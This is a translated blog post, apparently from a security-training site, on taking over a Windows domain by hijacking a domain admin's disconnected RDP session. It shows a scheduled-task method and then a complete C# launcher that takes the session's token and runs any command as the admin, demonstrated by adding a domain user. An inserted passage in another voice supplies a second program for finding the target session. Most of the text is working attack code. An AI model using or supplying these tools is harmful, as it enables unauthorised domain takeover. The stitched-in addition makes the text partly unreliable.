Preface

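Suppose a domain administrator uses RDP (port 3389) to log on to an ordinary domain-joined machine that the attacker controls, for maintenance or troubleshooting. When finished, the admin closes the Remote Desktop window instead of signing out. What risks does this create? Many readers will first think of dumping credentials. But what if no plaintext password can be recovered, or pass-the-hash is not possible?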

Domain privilege escalation via a scheduled task



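First, simulate a domain admin who logs on to an ordinary domain machine controlled by the attacker and then closes the Remote Desktop window, disconnecting without signing out: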





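The attacker can then escalate privileges in the domain as follows, using the creation of a new domain user as the example. The workflow is: create a scheduled task, select the domain admin as the user to run it, and set the command to execute.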

Set the location to search for the user to the domain:

Select the domain admin user who is still logged on:



Set the command to run:



Then run the scheduled task. The new domain user has been added successfully:



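Some readers may ask whether any domain user would work. It does not: if the selected user is not logged on to the machine, the task fails with a message saying the user is not logged on.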

How it works

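The principle is simple. Obtain a token belonging to the logged-on user, then call the CreateProcessAsUser API to create a new process under that token.

The complete code follows. Its core steps are:
1. Call WTSQueryUserToken to get the primary token of the user logged on to a given RDP session ID.
2. Pass that token to CreateProcessAsUser to start the process.

According to Microsoft's documentation, WTSQueryUserToken only succeeds when the caller runs as LocalSystem and holds the SE_TCB_NAME privilege. The program must therefore be started as SYSTEM on the controlled machine.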

using System;

using System.Runtime.InteropServices;

using System.ComponentModel;

using System.Security.Principal;

class Program

{

[DllImport("wtsapi32.dll", SetLastError = true)]

static extern bool WTSQueryUserToken(int sessionId, out IntPtr Token);

[DllImport("kernel32.dll", SetLastError = true)]

static extern bool CloseHandle(IntPtr hObject);

[DllImport("userenv.dll", SetLastError = true)]

static extern bool CreateEnvironmentBlock(out IntPtr lpEnvironment, IntPtr hToken, bool bInherit);

[DllImport("userenv.dll", SetLastError = true)]

static extern bool DestroyEnvironmentBlock(IntPtr lpEnvironment);

[DllImport("advapi32.dll", SetLastError = true)]

static extern bool CreateProcessAsUser(

IntPtr hToken,

string lpApplicationName,

string lpCommandLine,

IntPtr lpProcessAttributes,

IntPtr lpThreadAttributes,

bool bInheritHandles,

uint dwCreationFlags,

IntPtr lpEnvironment,

string lpCurrentDirectory,

ref STARTUPINFO lpStartupInfo,

out PROCESS_INFORMATION lpProcessInformation);

[StructLayout(LayoutKind.Sequential)]

struct STARTUPINFO

{

public int cb;

public string lpReserved;

public string lpDesktop;

public string lpTitle;

public uint dwX;

public uint dwY;

public uint dwXSize;

public uint dwYSize;

public uint dwXCountChars;

public uint dwYCountChars;

public uint dwFillAttribute;

public uint dwFlags;

public short wShowWindow;

public short cbReserved2;

public IntPtr lpReserved2;

public IntPtr hStdInput;

public IntPtr hStdOutput;

public IntPtr hStdError;

}

[StructLayout(LayoutKind.Sequential)]

struct PROCESS_INFORMATION

{

public IntPtr hProcess;

public IntPtr hThread;

public uint dwProcessId;

public uint dwThreadId;

}

static void Main(string[] args)

{

if (args.Length < 2)

{

Console.WriteLine("Usage: RdpProcessLauncher.exe <sessionId> <command>");

return;

}

int sessionId;

if (!int.TryParse(args[0], out sessionId))

{

Console.WriteLine("Invalid session ID");

return;

}

string command = args[1];

IntPtr userToken = IntPtr.Zero;

IntPtr envBlock = IntPtr.Zero;

try

{

// Get user token for the specified session

bool tokenResult = WTSQueryUserToken(sessionId, out userToken);

if (!tokenResult)

{

int error = Marshal.GetLastWin32Error();

throw new Win32Exception(error);

}

// Create environment block

bool envResult = CreateEnvironmentBlock(out envBlock, userToken, false);

if (!envResult)

{

int error = Marshal.GetLastWin32Error();

throw new Win32Exception(error);

}

// Prepare startup info

STARTUPINFO startupInfo = new STARTUPINFO();

startupInfo.cb = Marshal.SizeOf(startupInfo);

startupInfo.lpDesktop = "winsta0\\default";

PROCESS_INFORMATION processInfo = new PROCESS_INFORMATION();

// Create process as user

bool processResult = CreateProcessAsUser(

userToken,

null,

command,

IntPtr.Zero,

IntPtr.Zero,

false,

0x00000400, // CREATE_UNICODE_ENVIRONMENT

envBlock,

null,

ref startupInfo,

out processInfo);

if (!processResult)

{

int error = Marshal.GetLastWin32Error();

throw new Win32Exception(error);

}

Console.WriteLine("Process launched successfully. PID: {0}", processInfo.dwProcessId);

// Clean up process handles

CloseHandle(processInfo.hProcess);

CloseHandle(processInfo.hThread);

}

catch (Exception ex)

{

Console.WriteLine("Error: {0}", ex.Message);

}

finally

{

// Clean up resources

if (envBlock != IntPtr.Zero)

{

DestroyEnvironmentBlock(envBlock);

}

if (userToken != IntPtr.Zero)

{

CloseHandle(userToken);

}

}

}





}编译后进行尝试:

The token was stolen and the domain user was added successfully.
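The launcher above takes the target session ID as its first argument, but the article does not show how to find it. The built-in `query user` command lists sessions with their owners and states. The sketch below is a programmatic equivalent and is an assumption, not the author's code. It uses the real wtsapi32 functions WTSEnumerateSessions and WTSQuerySessionInformation to print each session's ID, the DOMAIN\user logged on to it, and its connection state. The class name `SessionLister` is hypothetical.

```csharp
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;

// Hypothetical helper (not from the original article): list local sessions
// and their logged-on users to pick a session ID for RdpProcessLauncher.exe.
class SessionLister
{
    // WTS_CONNECTSTATE_CLASS from wtsapi32.h (numeric values must match)
    internal enum WtsConnectState
    {
        WTSActive, WTSConnected, WTSConnectQuery, WTSShadow, WTSDisconnected,
        WTSIdle, WTSListen, WTSReset, WTSDown, WTSInit
    }

    // Subset of WTS_INFO_CLASS used here
    internal enum WtsInfoClass
    {
        WTSUserName = 5,
        WTSDomainName = 7
    }

    [StructLayout(LayoutKind.Sequential)]
    struct WTS_SESSION_INFO
    {
        public int SessionId;
        public IntPtr pWinStationName; // LPWSTR, not needed here
        public WtsConnectState State;
    }

    [DllImport("wtsapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool WTSEnumerateSessions(IntPtr hServer, int reserved, int version,
        out IntPtr ppSessionInfo, out int pCount);

    [DllImport("wtsapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool WTSQuerySessionInformation(IntPtr hServer, int sessionId,
        WtsInfoClass infoClass, out IntPtr ppBuffer, out int pBytesReturned);

    [DllImport("wtsapi32.dll")]
    static extern void WTSFreeMemory(IntPtr pMemory);

    // WTS_CURRENT_SERVER_HANDLE: query the local machine
    static readonly IntPtr CurrentServer = IntPtr.Zero;

    // Read one string property of a session; empty string on failure
    static string QueryString(int sessionId, WtsInfoClass infoClass)
    {
        IntPtr buffer;
        int bytes;
        if (!WTSQuerySessionInformation(CurrentServer, sessionId, infoClass, out buffer, out bytes))
            return "";
        try { return Marshal.PtrToStringUni(buffer) ?? ""; }
        finally { WTSFreeMemory(buffer); }
    }

    static void Main()
    {
        IntPtr sessions;
        int count;
        if (!WTSEnumerateSessions(CurrentServer, 0, 1, out sessions, out count))
            throw new Win32Exception(Marshal.GetLastWin32Error());
        try
        {
            int size = Marshal.SizeOf(typeof(WTS_SESSION_INFO));
            for (int i = 0; i < count; i++)
            {
                var info = (WTS_SESSION_INFO)Marshal.PtrToStructure(
                    IntPtr.Add(sessions, i * size), typeof(WTS_SESSION_INFO));
                string user = QueryString(info.SessionId, WtsInfoClass.WTSUserName);
                if (user.Length == 0) continue; // no user logged on to this session
                string domain = QueryString(info.SessionId, WtsInfoClass.WTSDomainName);
                Console.WriteLine("{0}\t{1}\\{2}\t{3}", info.SessionId, domain, user, info.State);
            }
        }
        finally { WTSFreeMemory(sessions); }
    }
}
```

Look for a line whose user is the domain admin and whose state is `WTSDisconnected`. Its first column is the session ID to pass to the launcher.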

Summary

This article demonstrated how stealing the token of a disconnected RDP session can be used to escalate privileges in a domain.

From: https://www.cnblogs.com/hetianlab/p/18589032